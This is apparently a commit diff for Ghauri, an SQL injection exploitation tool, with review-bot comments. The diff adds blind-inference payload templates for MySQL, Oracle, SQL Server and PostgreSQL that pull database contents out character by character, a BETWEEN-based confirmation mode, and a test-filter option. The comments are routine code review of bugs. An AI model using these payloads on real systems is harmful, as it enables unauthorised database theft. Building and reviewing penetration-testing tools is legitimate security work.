  • improved code quality, added further retrieval payloads, updated the character-confirmation code used when --fetch-using=between is set, and added a new switch for selecting tests by title(s); bumped version to 1.1.8

  • r0oth3x49 committed 1 year ago
    502f2a36
    1 parent 95d53fb4
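--- a/README.md
+++ b/README.md
@@ -1,4 +1,4 @@
-[![GitHub release](https://img.shields.io/badge/release-v1.1.7-brightgreen?style=flat-square)](https://github.com/r0oth3x49/ghauri/releases/tag/1.1.7)
+[![GitHub release](https://img.shields.io/badge/release-v1.1.8-brightgreen?style=flat-square)](https://github.com/r0oth3x49/ghauri/releases/tag/1.1.8)
 [![GitHub stars](https://img.shields.io/github/stars/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/stargazers)
 [![GitHub forks](https://img.shields.io/github/forks/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/network)
 [![GitHub issues](https://img.shields.io/github/issues/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/issues)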
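--- a/ghauri/__init__.py
+++ b/ghauri/__init__.py
@@ -24,7 +24,7 @@
 
 """
 
-__version__ = "1.1.7"
+__version__ = "1.1.8"
 __author__ = "Nasir Khan (r0ot h3x49)"
 __license__ = "MIT"
 __copyright__ = "Copyright (c) 2016-2025 Nasir Khan (r0ot h3x49)"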
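--- a/ghauri/common/config.py
+++ b/ghauri/common/config.py
@@ -98,6 +98,7 @@
 self.rto_warning = False
 self.fetch_using = None
 self.rtom_warning = False
+self.test_filter = None
 
 @property
 def session_filepath(self):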
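--- a/ghauri/common/payloads.py
+++ b/ghauri/common/payloads.py
@@ -35,39 +35,48 @@
 "MySQL": [
 "ORD(MID(LENGTH({query}),{position},1))={char}",
 "ORD(MID(IFNULL(LENGTH({query}),0),{position},1))={char}",
+"ORD(MID(IFNULL(CAST(LENGTH({query}) AS NCHAR),0),{position},1))={char}",
 ],
 "Oracle": [
 "ASCII(SUBSTRC(LENGTH({query}),{position},1))={char}",
 "ASCII(SUBSTRC(NVL(LENGTH({query}),0),{position},1))={char}",
+"ASCII(SUBSTRC(NVL(CAST(LENGTH({query}) AS VARCHAR(4000)),0),{position},1))={char}",
 ],
 "Microsoft SQL Server": [
 "UNICODE(SUBSTRING(LTRIM(STR(LEN({query}))),{position},1))={char}",
 "UNICODE(SUBSTRING(LEN({query}),{position},1))={char}",
+"UNICODE(SUBSTRING(ISNULL(CAST(LEN({query}) AS NVARCHAR(4000)),0),{position},1))={char}",
 ],
 "PostgreSQL": [
-"ASCII(SUBSTRING(LENGTH({query}::text)::text FROM {position} FOR 1))={char}"
+"ASCII(SUBSTRING(LENGTH({query}::text)::text FROM {position} FOR 1))={char}",
+"ASCII(SUBSTRING(COALESCE(LENGTH({query})::text,CHR(48))::text FROM {position} FOR 1))={char}"
+"ASCII(SUBSTRING(COALESCE(CAST(LENGTH({query})::text AS VARCHAR(10000))::text,CHR(32))::text FROM {position} FOR 1))={char}",
 ],
 }
 
 DATA_EXTRACTION_PAYLOADS = {
 "MySQL": {
-"ASCII": "ORD(MID({query},{position},1))={char}",
-"ASC": "ORD(MID(IFNULL({query},0x20),{position},1))={char}",
+"no-cast": "ORD(MID({query},{position},1))={char}",
+"isnull": "ORD(MID(IFNULL({query},0x20),{position},1))={char}",
+"cast": "ORD(MID(IFNULL(CAST({query} AS NCHAR),0x20),{position},1))={char}",
 # "CHAR": "MID({query},{position},1)=CHAR({char})",
 },
 "Oracle": {
-"ASCII": "ASCII(SUBSTRC({query},{position},1))={char}",
-"ASC": "ASCII(SUBSTRC(NVL({query},CHR(32)),{position},1))={char}",
+"no-cast": "ASCII(SUBSTRC({query},{position},1))={char}",
+"isnull": "ASCII(SUBSTRC(NVL({query},CHR(32)),{position},1))={char}",
+"cast": "ASCII(SUBSTRC(NVL(CAST({query} AS NVARCHAR(4000)),CHR(32)),{position},1))={char}",
 # "CHAR": "SUBSTR({query},{position},1)=CHR({char})",
 },
 "Microsoft SQL Server": {
-"ASCII": "UNICODE(SUBSTRING({query},{position},1))={char}",
-"ASC": "UNICODE(SUBSTRING(ISNULL({query},' '),{position},1))={char}",
+"no-cast": "UNICODE(SUBSTRING({query},{position},1))={char}",
+"isnull": "UNICODE(SUBSTRING(ISNULL({query},' '),{position},1))={char}",
+"cast": "UNICODE(SUBSTRING(ISNULL(CAST({query} AS NVARCHAR(4000)),' '),{position},1))={char}",
 # "CHAR": "SUBSTRING({query},{position},1)=CHAR({char})",
 },
 "PostgreSQL": {
-"ASCII": "ASCII(SUBSTRING({query}::text FROM {position} FOR 1))={char}",
-"ASC": "ASCII(SUBSTRING((COALESCE({query}::text,CHR(32)))::text FROM {position} FOR 1))={char}",
+"no-cast": "ASCII(SUBSTRING({query}::text FROM {position} FOR 1))={char}",
+"isnull": "ASCII(SUBSTRING((COALESCE({query}::text,CHR(32)))::text FROM {position} FOR 1))={char}",
+"cast": "ASCII(SUBSTRING((COALESCE(CAST({query} AS VARCHAR(10000))::text,CHR(32)))::text FROM {position} FOR 1))={char}",
 # "CHAR": "SUBSTRING({query}::text FROM {position} FOR 1)=CHR({char})",
 },
 }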
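Review bot: The second new PostgreSQL length payload (the `COALESCE(LENGTH({query})::text,CHR(48))` line) has no trailing comma, so Python's implicit string-literal concatenation glues it to the following `CAST(...)` line: the list ends up with two entries instead of three, and the glued entry contains two `={char}` comparisons and is not valid SQL. Add the comma: `"ASCII(SUBSTRING(COALESCE(LENGTH({query})::text,CHR(48))::text FROM {position} FOR 1))={char}",`. Separately, the DATA_EXTRACTION_PAYLOADS keys change from `"ASCII"`/`"ASC"` to `"no-cast"`/`"isnull"`/`"cast"`; any caller that still indexes by the old names (not visible in this diff) will raise KeyError, so it is worth confirming every consumer was updated in the same commit. A one-line comment above the dict stating the meaning of the three keys (plain, NULL-guarded, cast-and-NULL-guarded) would help the next reader.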
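--- a/ghauri/common/utils.py
+++ b/ghauri/common/utils.py
@@ -1895,6 +1895,16 @@
 vector=vector,
 )
 _temp.append(_r)
+# experimental..
+if conf.test_filter:
+_filtered_tests = []
+for t in _temp:
+title = t.title
+mobj = re.search(r"(?is)(?:%s)" % (re.escape(conf.test_filter)), title)
+if mobj:
+_filtered_tests.append(t)
+if _filtered_tests:
+_temp = _filtered_tests
 return _temp
 
 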
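Review bot: When `--test-filter` matches no test title, `_filtered_tests` stays empty and the `if _filtered_tests:` guard leaves `_temp` untouched, so the whole unfiltered test set runs with no indication that the filter was ignored; a typo in the filter is indistinguishable from a match. Emit a warning in that branch (via the module's logger, if one is in scope here) so the user sees the filter was dropped. The match itself is a case-insensitive substring test (`re.escape` removes any pattern meaning), so the loop reads more directly as `_filtered_tests = [t for t in _temp if re.search(r"(?is)(?:%s)" % re.escape(conf.test_filter), t.title)]`, and the `# experimental..` comment would serve better as `# --test-filter: keep only tests whose title contains the filter text (case-insensitive)`. The enclosing function starts outside the hunk.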
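--- a/ghauri/core/extract.py
+++ b/ghauri/core/extract.py
@@ -487,9 +487,23 @@
 char=ord(identified_character),
 )
 if vector_type == "time_vector":
-condition = replace_with(
-string=condition, character="=", replace_with="!="
-)
+if conf.fetch_using.lower() == "between":
+condition = replace_with(
+string=condition,
+character="=",
+replace_with=" NOT BETWEEN 0 AND ",
+)
+else:
+condition = replace_with(
+string=condition, character="=", replace_with="!="
+)
+if vector_type == "boolean_vector":
+if conf.fetch_using.lower() == "between":
+condition = replace_with(
+string=condition,
+character="=",
+replace_with=" BETWEEN 0 AND ",
+)
 expression = vector.replace("[INFERENCE]", f"{condition}").replace(
 "[SLEEPTIME]", f"{timesec}"
 )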
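Review bot: `conf.fetch_using.lower()` raises AttributeError when `fetch_using` is None, and None is its default both in config.py and in the Ghauri entry point changed by this same commit, so unless the CLI always supplies a string (not visible here) the confirmation path now crashes for callers that never set it. Evaluate the switch once and guard it: `use_between = (conf.fetch_using or "").lower() == "between"`, then test `use_between` in both the time_vector and boolean_vector branches instead of repeating the lookup three times. Also note that `NOT BETWEEN 0 AND {char}` holds only for values greater than `{char}`, whereas the `!=` it replaces holds for any value other than `{char}`; if that asymmetry is intentional for the between mode, a comment saying so on the time_vector branch would stop a reader from "fixing" it. The enclosing function starts and ends outside the hunk.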
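--- a/ghauri/ghauri.py
+++ b/ghauri/ghauri.py
@@ -88,4 +88,5 @@
 confirm_payloads=False,
 safe_chars=None,
 fetch_using=None,
+test_filter=None,
 ):
 verbose_levels = {
 1: logging.INFO,
@@ -102,6 +103,7 @@
 conf.safe_chars = safe_chars
 conf.timesec = timesec
 conf.fetch_using = fetch_using
+conf.test_filter = test_filter
 logger.start("starting")
 if not force_ssl:
 ssl._create_default_https_context = ssl._create_unverified_context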
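--- a/ghauri/scripts/ghauri.py
+++ b/ghauri/scripts/ghauri.py
@@ -64,6 +64,13 @@
 action="store_true",
 help="Flush session files for current target",
 )
+general.add_argument(
+"--test-filter",
+dest="test_filter",
+type=str,
+help="Select test payloads by titles (experimental)",
+metavar="",
+)
 
 target = parser.add_argument_group(
 "Target",
@@ -455,6 +462,7 @@
 confirm_payloads=args.confirm_payloads,
 safe_chars=args.safe_chars,
 fetch_using=args.fetch_using,
+test_filter=args.test_filter,
 )
 if resp.is_injected:
 target = ghauri.Ghauri(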
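Review bot: The help string for `--test-filter` says "by titles", but the implementation added in utils.py in this commit treats the value as one case-insensitive substring matched against each test title, and falls back to running every test when nothing matches; the plural and the word "select" suggest a list or exact match that is not there. Make the help text state the real contract, e.g. `help="Run only the tests whose title contains this text (case-insensitive; experimental)"`. A `metavar` such as `"TEXT"` instead of the empty string would also show the user that a value is expected, if the other options in this group do not deliberately use `metavar=""`.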
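--- a/setup.py
+++ b/setup.py
@@ -5,7 +5,7 @@
 
 setup(
 name="ghauri",
-version="1.1.7",
+version="1.1.8",
 description="An advanced SQL injection detection & exploitation tool.",
 classifiers=["Programming Language :: Python3"],
 author="Nasir Khan",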